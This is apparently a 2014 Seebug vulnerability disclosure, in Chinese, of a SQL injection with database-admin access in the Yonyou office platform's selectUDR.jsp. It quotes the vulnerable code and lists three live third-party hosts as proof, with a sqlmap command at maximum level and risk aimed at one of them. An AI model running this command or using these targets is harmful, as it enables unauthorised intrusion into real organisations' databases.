用友软件协作办公平台通用DBA权限SQL注入漏洞之三

2014-08-15T00:00:00
ID SSV:93346
Type seebug
Reporter Root
Modified 2014-08-15T00:00:00

Description

简要描述:

与http://www.wooyun.org/bugs/wooyun-2014-072183非同目录下

详细说明:

system/config/selectUDR.jsp

``` <% //String sIsModelWindow="0"; UserAnalyse userAnalyse=(UserAnalyse)ResourceManage.getContext("userAnalyse"); String saveValue=HtmlFormat.format(StringUtil.ISOToGBK(request.getParameter("id")));//注入点 String isModel=HtmlFormat.format(request.getParameter("isModel")); String tagValue=HtmlFormat.format(StringUtil.ISOToGBK(request.getParameter("tagValue"))); String tagShow=HtmlFormat.format(StringUtil.ISOToGBK(request.getParameter("tagShow"))); String showValue=""; saveValue="null".equals(saveValue)?"":saveValue; //if("".equals(saveValue)){ //saveValue="null".equals(tagValue)?"":tagValue; //} Map map=null; if(!"".equals(saveValue)) map=userAnalyse.getAllUserName(saveValue);//查询 if(map!=null){ for(Iterator it=map.keySet().iterator();it.hasNext();){ String v=(String)it.next(); if(v!=null) showValue+=v+","; } if(!"".equals(showValue)){ showValue=showValue.substring(0,showValue.lastIndexOf(",")); } }
String promptStr=request.getParameter("code");

%> ```

漏洞证明:

1.http://oa.danzi.com.cn:9090/system/config/selectUDR.jsp?id=1

<img src="https://images.seebug.org/upload/201408/141258258ab48a35e91c2c6696658db778bab490.jpg" alt="y.jpg" width="600" onerror="javascript:errimg(this);">

2.http://fsd2014.f3322.org:9090/system/config/selectUDR.jsp?id=1

测试语句: sqlmap -u "http://fsd2014.f3322.org:9090/system/config/selectUDR.jsp?id=1" --random-agent --level 5--risk 3

<img src="https://images.seebug.org/upload/201408/14125843a71d827d5e25b67fb45982dce3763326.jpg" alt="y11.jpg" width="600" onerror="javascript:errimg(this);">

3.http://220.168.210.109:9090/system/config/selectUDR.jsp?id=1

<img src="https://images.seebug.org/upload/201408/141326165a59531aa8d27d7fb42e74893f3035d7.jpg" alt="y.jpg" width="600" onerror="javascript:errimg(this);">